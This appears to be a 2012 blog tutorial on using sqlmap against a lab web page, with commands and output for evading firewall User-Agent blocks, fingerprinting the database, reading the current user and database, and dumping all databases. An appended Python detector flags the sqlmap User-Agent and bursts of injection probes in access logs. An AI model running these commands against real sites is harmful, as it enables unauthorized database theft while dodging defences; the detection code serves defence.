SQLMAP
Posted on 2012-9-15 16:41:18
If the target is HTTPS

Use the --force-ssl option.

Disguising the scanner

--referer=REFERER  # set the Referer header
--random-agent     # use a random browser User-Agent. The default is sqlmap/1.0-dev-dbce417 (http://sqlmap.org), and many firewalls block on that keyword. Just pass the flag; it takes no value.

Result:

root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --referer=google.com --random-agent -v10
[21:37:42] [TRAFFIC OUT] HTTP request [#1]:
GET /pen/news.php?id=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 5.5.5.8
Referer: google.com
Pragma: no-cache
Cache-control: no-cache,no-store
Connection: close
Specifying the DBMS: by default sqlmap probes one backend after another (PostgreSQL, MSSQL, MySQL, and so on); telling it the DBMS speeds things up.
For example:
[16:14:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:14:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:14:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:14:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:15:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:15:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[16:15:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:15:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:15:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:15:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:15:03] [INFO] testing 'Oracle AND time-based blind'
[16:15:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
Specify it:
root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --dbms=mysql

Specify the operating system with --os=linux or --os=windows. Save the HTTP traffic to a file of your choice with -t:
root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -t 1
root@Dis9Team:~# cat 1
HTTP request [#1]:
GET /pen/news.php?id=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-dbce417 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 5.5.5.8
Pragma: no-cache
Cache-control: no-cache,no-store
Connection: close
Current user
root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --current-user
[21:50:19] [INFO] fetching current user
current user:    'root@localhost'

Current database
root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --current-db
[21:51:16] [INFO] fetching current database
current database:    'pentest'

Custom thread count
root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --threads=10

Dump the contents of all databases:
root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --dump-all
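The post makes two points a defender should take from it: the default sqlmap User-Agent is blocked by many firewalls, but --random-agent replaces it with a browser one, so a User-Agent signature alone is easy to evade; and the scanner fires many probes per second at the same URL and parameter (about 15 tests in 14 seconds in the log above, more with --threads). The following detector is an added example, not code from the original post or from sqlmap: it reads access-log lines and combines a tool-signature check with a burst check on (client IP, path, parameter name). The log format, the thresholds and the sample lines are constructed for this example.

```python
"""
Added example (not from the original post or from sqlmap): behaviour-based
detection of automated SQL-injection probing in a web server access log.
A User-Agent signature catches the default sqlmap UA; a burst check on
(client IP, path, parameter) catches a scanner hiding behind a browser UA.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Combined-log-format line: ip ident user [ts] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Case-insensitive substrings that identify a known scanner User-Agent.
TOOL_UA_MARKERS = ("sqlmap",)

# Constructed sample log: one request with the default sqlmap UA, a burst of
# six distinct id values in nine seconds behind a browser UA (what
# --random-agent traffic looks like), and two ordinary page views.
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Sep/2012:21:37:42 +0800] "GET /pen/news.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev-dbce417 (http://sqlmap.org)"',
    '203.0.113.5 - - [15/Sep/2012:16:14:49 +0800] "GET /pen/news.php?id=1 HTTP/1.1" 200 512 "google.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16"',
    '203.0.113.5 - - [15/Sep/2012:16:14:50 +0800] "GET /pen/news.php?id=1%27 HTTP/1.1" 500 210 "google.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16"',
    '203.0.113.5 - - [15/Sep/2012:16:14:52 +0800] "GET /pen/news.php?id=1%22 HTTP/1.1" 200 512 "google.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16"',
    '203.0.113.5 - - [15/Sep/2012:16:14:55 +0800] "GET /pen/news.php?id=1%29 HTTP/1.1" 500 210 "google.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16"',
    '203.0.113.5 - - [15/Sep/2012:16:14:57 +0800] "GET /pen/news.php?id=1%27%29 HTTP/1.1" 500 210 "google.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16"',
    '203.0.113.5 - - [15/Sep/2012:16:14:58 +0800] "GET /pen/news.php?id=9999 HTTP/1.1" 404 180 "google.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16"',
    '192.0.2.10 - - [15/Sep/2012:16:20:01 +0800] "GET /pen/news.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/15.0"',
    '192.0.2.10 - - [15/Sep/2012:16:20:40 +0800] "GET /pen/news.php?id=2 HTTP/1.1" 200 530 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/15.0"',
]


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # Decoded query parameters, so %27 and a literal quote count as one value.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def detect(lines, window_seconds=10, max_variants=5):
    """Return a list of (reason, client_ip, detail) findings for the given log lines."""
    findings = []
    seen = defaultdict(list)  # (ip, path, param) -> [(timestamp, value), ...]
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ua = rec["ua"].lower()
        if any(marker in ua for marker in TOOL_UA_MARKERS):
            findings.append(("tool-user-agent", rec["ip"], rec["ua"]))
        for name, values in rec["params"].items():
            for value in values:
                seen[(rec["ip"], rec["path"], name)].append((rec["ts"], value))
    # Burst check: at least max_variants distinct values for one parameter,
    # from one client, against one path, inside a window_seconds window.
    for (ip, path, name), events in seen.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            in_window = [v for t, v in events[i:] if (t - t0).total_seconds() <= window_seconds]
            distinct = set(in_window)
            if len(distinct) >= max_variants:
                detail = f"{path}?{name}: {len(distinct)} distinct values within {window_seconds}s"
                findings.append(("parameter-fuzzing-burst", ip, detail))
                break  # one finding per (ip, path, param) is enough
    return findings


if __name__ == "__main__":
    for reason, ip, detail in detect(SAMPLE_LOG):
        print(f"{reason:26} {ip:15} {detail}")
```

The burst threshold is the part worth tuning: a real site has legitimate clients that page through ids, so the window and variant count should be set from a baseline of normal traffic, and the 5xx status codes in the burst (error-based tests provoke them) are a good secondary signal to weight in.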